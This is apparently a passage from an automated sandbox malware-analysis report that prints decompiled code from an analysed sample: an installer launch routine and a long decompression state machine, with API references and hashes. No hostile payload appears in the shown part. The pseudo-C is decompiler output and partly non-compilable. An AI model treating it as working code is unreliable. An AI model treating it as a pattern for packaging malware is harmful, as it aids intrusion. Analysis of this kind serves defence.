                                                                                                                                                                            • CallWindowProcA.USER32(?,?,?,?), ref: 00404F06
                                                                                                                                                                              • Part of subcall function 00403F2A: SendMessageA.USER32(00000000,00000000,00000000,00000000), ref: 00403F3C
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1199265707.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000002.00000002.1199203612.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199348328.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199395587.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199504236.0000000000414000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199619601.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199666920.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199710810.0000000000429000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199764798.0000000000436000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199807226.000000000043A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199847230.000000000043B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_Jjfmcz1Hsz.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Window$CallMessageProcSendVisible
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3748168415-3916222277
                                                                                                                                                                            • Opcode ID: d7dba211b113031370aa0d375adf93c2d3682e4ecf800ebd227cab9ba7078c69
                                                                                                                                                                            • Instruction ID: f49a9e3fcece2dd6490d1841f3d0f5b5163df4d3f93a23d44cf999a9bd086e10
                                                                                                                                                                            • Opcode Fuzzy Hash: d7dba211b113031370aa0d375adf93c2d3682e4ecf800ebd227cab9ba7078c69
                                                                                                                                                                            • Instruction Fuzzy Hash: D10171B110020EABDF209F11DC84A9B3725FBC4754F208037FB11761D1DB799C61A7A9
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                            			E0040548A(CHAR* _a4) {
                                                                                                                                                                            				struct _PROCESS_INFORMATION _v20;
                                                                                                                                                                            				int _t7;
                                                                                                                                                                            
                                                                                                                                                                            				0x421510->cb = 0x44;
                                                                                                                                                                            				_t7 = CreateProcessA(0, _a4, 0, 0, 0, 0x4000000, 0, 0, 0x421510,  &_v20); // executed
                                                                                                                                                                            				if(_t7 != 0) {
                                                                                                                                                                            					CloseHandle(_v20.hThread);
                                                                                                                                                                            					return _v20.hProcess;
                                                                                                                                                                            				}
                                                                                                                                                                            				return _t7;
                                                                                                                                                                            			}





                                                                                                                                                                            0x00405493
                                                                                                                                                                            0x004054b3
                                                                                                                                                                            0x004054bb
                                                                                                                                                                            0x004054c0
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x004054c6
                                                                                                                                                                            0x004054ca

                                                                                                                                                                            APIs
                                                                                                                                                                            • CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00421510,Error launching installer), ref: 004054B3
                                                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 004054C0
                                                                                                                                                                            Strings
                                                                                                                                                                            • Error launching installer, xrefs: 0040549D
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1199265707.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000002.00000002.1199203612.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199348328.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199395587.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199504236.0000000000414000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199619601.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199666920.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199710810.0000000000429000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199764798.0000000000436000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199807226.000000000043A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199847230.000000000043B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_Jjfmcz1Hsz.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CloseCreateHandleProcess
                                                                                                                                                                            • String ID: Error launching installer
                                                                                                                                                                            • API String ID: 3712363035-66219284
                                                                                                                                                                            • Opcode ID: 8c32d595c10ae78cfc35805ab98709760fd6cf99201592758dbf5461ff55bb51
                                                                                                                                                                            • Instruction ID: 90ee3f3d0c484d323fd0424032eb65db2415cafeee3384e03f1d9bc4b04e7a5d
                                                                                                                                                                            • Opcode Fuzzy Hash: 8c32d595c10ae78cfc35805ab98709760fd6cf99201592758dbf5461ff55bb51
                                                                                                                                                                            • Instruction Fuzzy Hash: FFE04FB4A002097FEB009B60EC05F7B7BBCEB00348F408561BD11F21A0E374A9508A78
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 99%
                                                                                                                                                                            			E00406779() {
                                                                                                                                                                            				signed int _t530;
                                                                                                                                                                            				void _t537;
                                                                                                                                                                            				signed int _t538;
                                                                                                                                                                            				signed int _t539;
                                                                                                                                                                            				unsigned short _t569;
                                                                                                                                                                            				signed int _t579;
                                                                                                                                                                            				signed int _t607;
                                                                                                                                                                            				void* _t627;
                                                                                                                                                                            				signed int _t628;
                                                                                                                                                                            				signed int _t635;
                                                                                                                                                                            				signed int* _t643;
                                                                                                                                                                            				void* _t644;
                                                                                                                                                                            
                                                                                                                                                                            				L0:
                                                                                                                                                                            				while(1) {
                                                                                                                                                                            					L0:
                                                                                                                                                                            					_t530 =  *(_t644 - 0x30);
                                                                                                                                                                            					if(_t530 >= 4) {
                                                                                                                                                                            					}
                                                                                                                                                                            					 *(_t644 - 0x40) = 6;
                                                                                                                                                                            					 *(_t644 - 0x7c) = 0x19;
                                                                                                                                                                            					 *((intOrPtr*)(_t644 - 0x58)) = (_t530 << 7) +  *(_t644 - 4) + 0x360;
                                                                                                                                                                            					while(1) {
                                                                                                                                                                            						L145:
                                                                                                                                                                            						 *(_t644 - 0x50) = 1;
                                                                                                                                                                            						 *(_t644 - 0x48) =  *(_t644 - 0x40);
                                                                                                                                                                            						while(1) {
                                                                                                                                                                            							L149:
                                                                                                                                                                            							if( *(_t644 - 0x48) <= 0) {
                                                                                                                                                                            								goto L155;
                                                                                                                                                                            							}
                                                                                                                                                                            							L150:
                                                                                                                                                                            							_t627 =  *(_t644 - 0x50) +  *(_t644 - 0x50);
                                                                                                                                                                            							_t643 = _t627 +  *((intOrPtr*)(_t644 - 0x58));
                                                                                                                                                                            							 *(_t644 - 0x54) = _t643;
                                                                                                                                                                            							_t569 =  *_t643;
                                                                                                                                                                            							_t635 = _t569 & 0x0000ffff;
                                                                                                                                                                            							_t607 = ( *(_t644 - 0x10) >> 0xb) * _t635;
                                                                                                                                                                            							if( *(_t644 - 0xc) >= _t607) {
                                                                                                                                                                            								 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t607;
                                                                                                                                                                            								 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t607;
                                                                                                                                                                            								_t628 = _t627 + 1;
                                                                                                                                                                            								 *_t643 = _t569 - (_t569 >> 5);
                                                                                                                                                                            								 *(_t644 - 0x50) = _t628;
                                                                                                                                                                            							} else {
                                                                                                                                                                            								 *(_t644 - 0x10) = _t607;
                                                                                                                                                                            								 *(_t644 - 0x50) =  *(_t644 - 0x50) << 1;
                                                                                                                                                                            								 *_t643 = (0x800 - _t635 >> 5) + _t569;
                                                                                                                                                                            							}
                                                                                                                                                                            							if( *(_t644 - 0x10) >= 0x1000000) {
                                                                                                                                                                            								L148:
                                                                                                                                                                            								_t487 = _t644 - 0x48;
                                                                                                                                                                            								 *_t487 =  *(_t644 - 0x48) - 1;
                                                                                                                                                                            								L149:
                                                                                                                                                                            								if( *(_t644 - 0x48) <= 0) {
                                                                                                                                                                            									goto L155;
                                                                                                                                                                            								}
                                                                                                                                                                            								goto L150;
                                                                                                                                                                            							} else {
                                                                                                                                                                            								L154:
                                                                                                                                                                            								L146:
                                                                                                                                                                            								if( *(_t644 - 0x6c) == 0) {
                                                                                                                                                                            									L169:
                                                                                                                                                                            									 *(_t644 - 0x88) = 0x18;
                                                                                                                                                                            									L170:
                                                                                                                                                                            									_t579 = 0x22;
                                                                                                                                                                            									memcpy( *(_t644 - 0x90), _t644 - 0x88, _t579 << 2);
                                                                                                                                                                            									_t539 = 0;
                                                                                                                                                                            									L172:
                                                                                                                                                                            									return _t539;
                                                                                                                                                                            								}
                                                                                                                                                                            								L147:
                                                                                                                                                                            								 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
                                                                                                                                                                            								 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
                                                                                                                                                                            								_t484 = _t644 - 0x70;
                                                                                                                                                                            								 *_t484 =  &(( *(_t644 - 0x70))[1]);
                                                                                                                                                                            								 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
                                                                                                                                                                            								goto L148;
                                                                                                                                                                            							}
                                                                                                                                                                            							L155:
                                                                                                                                                                            							_t537 =  *(_t644 - 0x7c);
                                                                                                                                                                            							 *((intOrPtr*)(_t644 - 0x44)) =  *(_t644 - 0x50) - (1 <<  *(_t644 - 0x40));
                                                                                                                                                                            							while(1) {
                                                                                                                                                                            								L140:
                                                                                                                                                                            								 *(_t644 - 0x88) = _t537;
                                                                                                                                                                            								while(1) {
                                                                                                                                                                            									L1:
                                                                                                                                                                            									_t538 =  *(_t644 - 0x88);
                                                                                                                                                                            									if(_t538 > 0x1c) {
                                                                                                                                                                            										break;
                                                                                                                                                                            									}
                                                                                                                                                                            									L2:
                                                                                                                                                                            									switch( *((intOrPtr*)(_t538 * 4 +  &M00406BE7))) {
                                                                                                                                                                            										case 0:
                                                                                                                                                                            											L3:
                                                                                                                                                                            											if( *(_t644 - 0x6c) == 0) {
                                                                                                                                                                            												goto L170;
                                                                                                                                                                            											}
                                                                                                                                                                            											L4:
                                                                                                                                                                            											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
                                                                                                                                                                            											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
                                                                                                                                                                            											_t538 =  *( *(_t644 - 0x70));
                                                                                                                                                                            											if(_t538 > 0xe1) {
                                                                                                                                                                            												goto L171;
                                                                                                                                                                            											}
                                                                                                                                                                            											L5:
                                                                                                                                                                            											_t542 = _t538 & 0x000000ff;
                                                                                                                                                                            											_push(0x2d);
                                                                                                                                                                            											asm("cdq");
                                                                                                                                                                            											_pop(_t581);
                                                                                                                                                                            											_push(9);
                                                                                                                                                                            											_pop(_t582);
                                                                                                                                                                            											_t638 = _t542 / _t581;
                                                                                                                                                                            											_t544 = _t542 % _t581 & 0x000000ff;
                                                                                                                                                                            											asm("cdq");
                                                                                                                                                                            											_t633 = _t544 % _t582 & 0x000000ff;
                                                                                                                                                                            											 *(_t644 - 0x3c) = _t633;
                                                                                                                                                                            											 *(_t644 - 0x1c) = (1 << _t638) - 1;
                                                                                                                                                                            											 *((intOrPtr*)(_t644 - 0x18)) = (1 << _t544 / _t582) - 1;
                                                                                                                                                                            											_t641 = (0x300 << _t633 + _t638) + 0x736;
                                                                                                                                                                            											if(0x600 ==  *((intOrPtr*)(_t644 - 0x78))) {
                                                                                                                                                                            												L10:
                                                                                                                                                                            												if(_t641 == 0) {
                                                                                                                                                                            													L12:
                                                                                                                                                                            													 *(_t644 - 0x48) =  *(_t644 - 0x48) & 0x00000000;
                                                                                                                                                                            													 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
                                                                                                                                                                            													goto L15;
                                                                                                                                                                            												} else {
                                                                                                                                                                            													goto L11;
                                                                                                                                                                            												}
                                                                                                                                                                            												do {
                                                                                                                                                                            													L11:
                                                                                                                                                                            													_t641 = _t641 - 1;
                                                                                                                                                                            													 *((short*)( *(_t644 - 4) + _t641 * 2)) = 0x400;
                                                                                                                                                                            												} while (_t641 != 0);
                                                                                                                                                                            												goto L12;
                                                                                                                                                                            											}
                                                                                                                                                                            											L6:
                                                                                                                                                                            											if( *(_t644 - 4) != 0) {
                                                                                                                                                                            												GlobalFree( *(_t644 - 4)); // executed
                                                                                                                                                                            											}
                                                                                                                                                                            											_t538 = GlobalAlloc(0x40, 0x600); // executed
                                                                                                                                                                            											 *(_t644 - 4) = _t538;
                                                                                                                                                                            											if(_t538 == 0) {
                                                                                                                                                                            												goto L171;
                                                                                                                                                                            											} else {
                                                                                                                                                                            												 *((intOrPtr*)(_t644 - 0x78)) = 0x600;
                                                                                                                                                                            												goto L10;
                                                                                                                                                                            											}
                                                                                                                                                                            										case 1:
                                                                                                                                                                            											L13:
                                                                                                                                                                            											__eflags =  *(_t644 - 0x6c);
                                                                                                                                                                            											if( *(_t644 - 0x6c) == 0) {
                                                                                                                                                                            												L157:
                                                                                                                                                                            												 *(_t644 - 0x88) = 1;
                                                                                                                                                                            												goto L170;
                                                                                                                                                                            											}
                                                                                                                                                                            											L14:
                                                                                                                                                                            											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
                                                                                                                                                                            											 *(_t644 - 0x40) =  *(_t644 - 0x40) | ( *( *(_t644 - 0x70)) & 0x000000ff) <<  *(_t644 - 0x48) << 0x00000003;
                                                                                                                                                                            											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
                                                                                                                                                                            											_t45 = _t644 - 0x48;
                                                                                                                                                                            											 *_t45 =  *(_t644 - 0x48) + 1;
                                                                                                                                                                            											__eflags =  *_t45;
                                                                                                                                                                            											L15:
                                                                                                                                                                            											if( *(_t644 - 0x48) < 4) {
                                                                                                                                                                            												goto L13;
                                                                                                                                                                            											}
                                                                                                                                                                            											L16:
                                                                                                                                                                            											_t550 =  *(_t644 - 0x40);
                                                                                                                                                                            											if(_t550 ==  *(_t644 - 0x74)) {
                                                                                                                                                                            												L20:
                                                                                                                                                                            												 *(_t644 - 0x48) = 5;
                                                                                                                                                                            												 *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) =  *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) & 0x00000000;
                                                                                                                                                                            												goto L23;
                                                                                                                                                                            											}
                                                                                                                                                                            											L17:
                                                                                                                                                                            											 *(_t644 - 0x74) = _t550;
                                                                                                                                                                            											if( *(_t644 - 8) != 0) {
                                                                                                                                                                            												GlobalFree( *(_t644 - 8)); // executed
                                                                                                                                                                            											}
                                                                                                                                                                            											_t538 = GlobalAlloc(0x40,  *(_t644 - 0x40)); // executed
                                                                                                                                                                            											 *(_t644 - 8) = _t538;
                                                                                                                                                                            											if(_t538 == 0) {
                                                                                                                                                                            												goto L171;
                                                                                                                                                                            											} else {
                                                                                                                                                                            												goto L20;
                                                                                                                                                                            											}
                                                                                                                                                                            										case 2:
                                                                                                                                                                            											L24:
                                                                                                                                                                            											_t557 =  *(_t644 - 0x60) &  *(_t644 - 0x1c);
                                                                                                                                                                            											 *(_t644 - 0x84) = 6;
                                                                                                                                                                            											 *(_t644 - 0x4c) = _t557;
                                                                                                                                                                            											_t642 =  *(_t644 - 4) + (( *(_t644 - 0x38) << 4) + _t557) * 2;
                                                                                                                                                                            											goto L132;
                                                                                                                                                                            										case 3:
                                                                                                                                                                            											L21:
                                                                                                                                                                            											__eflags =  *(_t644 - 0x6c);
                                                                                                                                                                            											if( *(_t644 - 0x6c) == 0) {
                                                                                                                                                                            												L158:
                                                                                                                                                                            												 *(_t644 - 0x88) = 3;
                                                                                                                                                                            												goto L170;
                                                                                                                                                                            											}
                                                                                                                                                                            											L22:
                                                                                                                                                                            											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
                                                                                                                                                                            											_t67 = _t644 - 0x70;
                                                                                                                                                                            											 *_t67 =  &(( *(_t644 - 0x70))[1]);
                                                                                                                                                                            											__eflags =  *_t67;
                                                                                                                                                                            											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
                                                                                                                                                                            											L23:
                                                                                                                                                                            											 *(_t644 - 0x48) =  *(_t644 - 0x48) - 1;
                                                                                                                                                                            											if( *(_t644 - 0x48) != 0) {
                                                                                                                                                                            												goto L21;
                                                                                                                                                                            											}
                                                                                                                                                                            											goto L24;
                                                                                                                                                                            										case 4:
                                                                                                                                                                            											L133:
                                                                                                                                                                            											_t559 =  *_t642;
                                                                                                                                                                            											_t626 = _t559 & 0x0000ffff;
                                                                                                                                                                            											_t596 = ( *(_t644 - 0x10) >> 0xb) * _t626;
                                                                                                                                                                            											if( *(_t644 - 0xc) >= _t596) {
                                                                                                                                                                            												 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t596;
                                                                                                                                                                            												 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t596;
                                                                                                                                                                            												 *(_t644 - 0x40) = 1;
                                                                                                                                                                            												_t560 = _t559 - (_t559 >> 5);
                                                                                                                                                                            												__eflags = _t560;
                                                                                                                                                                            												 *_t642 = _t560;
                                                                                                                                                                            											} else {
                                                                                                                                                                            												 *(_t644 - 0x10) = _t596;
                                                                                                                                                                            												 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
                                                                                                                                                                            												 *_t642 = (0x800 - _t626 >> 5) + _t559;
                                                                                                                                                                            											}
                                                                                                                                                                            											if( *(_t644 - 0x10) >= 0x1000000) {
                                                                                                                                                                            												goto L139;
                                                                                                                                                                            											} else {
                                                                                                                                                                            												goto L137;
                                                                                                                                                                            											}
                                                                                                                                                                            										case 5:
                                                                                                                                                                            											L137:
                                                                                                                                                                            											if( *(_t644 - 0x6c) == 0) {
                                                                                                                                                                            												L168:
                                                                                                                                                                            												 *(_t644 - 0x88) = 5;
                                                                                                                                                                            												goto L170;
                                                                                                                                                                            											}
                                                                                                                                                                            											L138:
                                                                                                                                                                            											 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
                                                                                                                                                                            											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
                                                                                                                                                                            											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
                                                                                                                                                                            											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
                                                                                                                                                                            											L139:
                                                                                                                                                                            											_t537 =  *(_t644 - 0x84);
                                                                                                                                                                            											L140:
                                                                                                                                                                            											 *(_t644 - 0x88) = _t537;
                                                                                                                                                                            											goto L1;
                                                                                                                                                                            										case 6:
                                                                                                                                                                            											L25:
                                                                                                                                                                            											__edx = 0;
                                                                                                                                                                            											__eflags =  *(__ebp - 0x40);
                                                                                                                                                                            											if( *(__ebp - 0x40) != 0) {
                                                                                                                                                                            												L36:
                                                                                                                                                                            												__eax =  *(__ebp - 4);
                                                                                                                                                                            												__ecx =  *(__ebp - 0x38);
                                                                                                                                                                            												 *(__ebp - 0x34) = 1;
                                                                                                                                                                            												 *(__ebp - 0x84) = 7;
                                                                                                                                                                            												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                                                                                                                                                                            												goto L132;
                                                                                                                                                                            											}
                                                                                                                                                                            											L26:
                                                                                                                                                                            											__eax =  *(__ebp - 0x5c) & 0x000000ff;
                                                                                                                                                                            											__esi =  *(__ebp - 0x60);
                                                                                                                                                                            											__cl = 8;
                                                                                                                                                                            											__cl = 8 -  *(__ebp - 0x3c);
                                                                                                                                                                            											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                                                                                                                                                                            											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                                                                                                                                                                            											__ecx =  *(__ebp - 0x3c);
                                                                                                                                                                            											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                                                                                                                                                                            											__ecx =  *(__ebp - 4);
                                                                                                                                                                            											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                                                                                                                                                                            											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                                                                                                                                                                            											__eflags =  *(__ebp - 0x38) - 4;
                                                                                                                                                                            											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                                                                                                                                            											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                                                                                                                                            											if( *(__ebp - 0x38) >= 4) {
                                                                                                                                                                            												__eflags =  *(__ebp - 0x38) - 0xa;
                                                                                                                                                                            												if( *(__ebp - 0x38) >= 0xa) {
                                                                                                                                                                            													_t98 = __ebp - 0x38;
                                                                                                                                                                            													 *_t98 =  *(__ebp - 0x38) - 6;
                                                                                                                                                                            													__eflags =  *_t98;
                                                                                                                                                                            												} else {
                                                                                                                                                                            													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                                                                                                                                                                            												}
                                                                                                                                                                            											} else {
                                                                                                                                                                            												 *(__ebp - 0x38) = 0;
                                                                                                                                                                            											}
                                                                                                                                                                            											__eflags =  *(__ebp - 0x34) - __edx;
                                                                                                                                                                            											if( *(__ebp - 0x34) == __edx) {
                                                                                                                                                                            												L35:
                                                                                                                                                                            												__ebx = 0;
                                                                                                                                                                            												__ebx = 1;
                                                                                                                                                                            												goto L61;
                                                                                                                                                                            											} else {
                                                                                                                                                                            												L32:
                                                                                                                                                                            												__eax =  *(__ebp - 0x14);
                                                                                                                                                                            												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                                                                                                                            												__eflags = __eax -  *(__ebp - 0x74);
                                                                                                                                                                            												if(__eax >=  *(__ebp - 0x74)) {
                                                                                                                                                                            													__eax = __eax +  *(__ebp - 0x74);
                                                                                                                                                                            													__eflags = __eax;
                                                                                                                                                                            												}
                                                                                                                                                                            												__ecx =  *(__ebp - 8);
                                                                                                                                                                            												__ebx = 0;
                                                                                                                                                                            												__ebx = 1;
                                                                                                                                                                            												__al =  *((intOrPtr*)(__eax + __ecx));
                                                                                                                                                                            												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                                                                                                                                                                            												goto L41;
                                                                                                                                                                            											}
                                                                                                                                                                            										case 7:
                                                                                                                                                                            											L66:
                                                                                                                                                                            											__eflags =  *(__ebp - 0x40) - 1;
                                                                                                                                                                            											if( *(__ebp - 0x40) != 1) {
                                                                                                                                                                            												L68:
                                                                                                                                                                            												__eax =  *(__ebp - 0x24);
                                                                                                                                                                            												 *(__ebp - 0x80) = 0x16;
                                                                                                                                                                            												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                                                                                                                                            												__eax =  *(__ebp - 0x28);
                                                                                                                                                                            												 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                                                                                                                                            												__eax =  *(__ebp - 0x2c);
                                                                                                                                                                            												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                                                                                                                                            												__eax = 0;
                                                                                                                                                                            												__eflags =  *(__ebp - 0x38) - 7;
                                                                                                                                                                            												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                                                                                                                                            												__al = __al & 0x000000fd;
                                                                                                                                                                            												__eax = (__eflags >= 0) - 1 + 0xa;
                                                                                                                                                                            												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                                                                                                                                                                            												__eax =  *(__ebp - 4);
                                                                                                                                                                            												__eax =  *(__ebp - 4) + 0x664;
                                                                                                                                                                            												__eflags = __eax;
                                                                                                                                                                            												 *(__ebp - 0x58) = __eax;
                                                                                                                                                                            												goto L69;
                                                                                                                                                                            											}
                                                                                                                                                                            											L67:
                                                                                                                                                                            											__eax =  *(__ebp - 4);
                                                                                                                                                                            											__ecx =  *(__ebp - 0x38);
                                                                                                                                                                            											 *(__ebp - 0x84) = 8;
                                                                                                                                                                            											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                                                                                                                                                                            											goto L132;
                                                                                                                                                                            										case 8:
                                                                                                                                                                            											L70:
                                                                                                                                                                            											__eflags =  *(__ebp - 0x40);
                                                                                                                                                                            											if( *(__ebp - 0x40) != 0) {
                                                                                                                                                                            												__eax =  *(__ebp - 4);
                                                                                                                                                                            												__ecx =  *(__ebp - 0x38);
                                                                                                                                                                            												 *(__ebp - 0x84) = 0xa;
                                                                                                                                                                            												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                                                                                                                                                                            											} else {
                                                                                                                                                                            												__eax =  *(__ebp - 0x38);
                                                                                                                                                                            												__ecx =  *(__ebp - 4);
                                                                                                                                                                            												__eax =  *(__ebp - 0x38) + 0xf;
                                                                                                                                                                            												 *(__ebp - 0x84) = 9;
                                                                                                                                                                            												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                                                                                                                                                                            												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                                                                                                                                                                            											}
                                                                                                                                                                            											goto L132;
                                                                                                                                                                            										case 9:
                                                                                                                                                                            											L73:
                                                                                                                                                                            											__eflags =  *(__ebp - 0x40);
                                                                                                                                                                            											if( *(__ebp - 0x40) != 0) {
                                                                                                                                                                            												goto L90;
                                                                                                                                                                            											}
                                                                                                                                                                            											L74:
                                                                                                                                                                            											__eflags =  *(__ebp - 0x60);
                                                                                                                                                                            											if( *(__ebp - 0x60) == 0) {
                                                                                                                                                                            												goto L171;
                                                                                                                                                                            											}
                                                                                                                                                                            											L75:
                                                                                                                                                                            											__eax = 0;
                                                                                                                                                                            											__eflags =  *(__ebp - 0x38) - 7;
                                                                                                                                                                            											_t259 =  *(__ebp - 0x38) - 7 >= 0;
                                                                                                                                                                            											__eflags = _t259;
                                                                                                                                                                            											0 | _t259 = _t259 + _t259 + 9;
                                                                                                                                                                            											 *(__ebp - 0x38) = _t259 + _t259 + 9;
                                                                                                                                                                            											goto L76;
                                                                                                                                                                            										case 0xa:
                                                                                                                                                                            											L82:
                                                                                                                                                                            											__eflags =  *(__ebp - 0x40);
                                                                                                                                                                            											if( *(__ebp - 0x40) != 0) {
                                                                                                                                                                            												L84:
                                                                                                                                                                            												__eax =  *(__ebp - 4);
                                                                                                                                                                            												__ecx =  *(__ebp - 0x38);
                                                                                                                                                                            												 *(__ebp - 0x84) = 0xb;
                                                                                                                                                                            												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                                                                                                                                                                            												goto L132;
                                                                                                                                                                            											}
                                                                                                                                                                            											L83:
                                                                                                                                                                            											__eax =  *(__ebp - 0x28);
                                                                                                                                                                            											goto L89;
                                                                                                                                                                            										case 0xb:
                                                                                                                                                                            											L85:
                                                                                                                                                                            											__eflags =  *(__ebp - 0x40);
                                                                                                                                                                            											if( *(__ebp - 0x40) != 0) {
                                                                                                                                                                            												__ecx =  *(__ebp - 0x24);
                                                                                                                                                                            												__eax =  *(__ebp - 0x20);
                                                                                                                                                                            												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                                                                                                                                            											} else {
                                                                                                                                                                            												__eax =  *(__ebp - 0x24);
                                                                                                                                                                            											}
                                                                                                                                                                            											__ecx =  *(__ebp - 0x28);
                                                                                                                                                                            											 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                                                                                                                                            											L89:
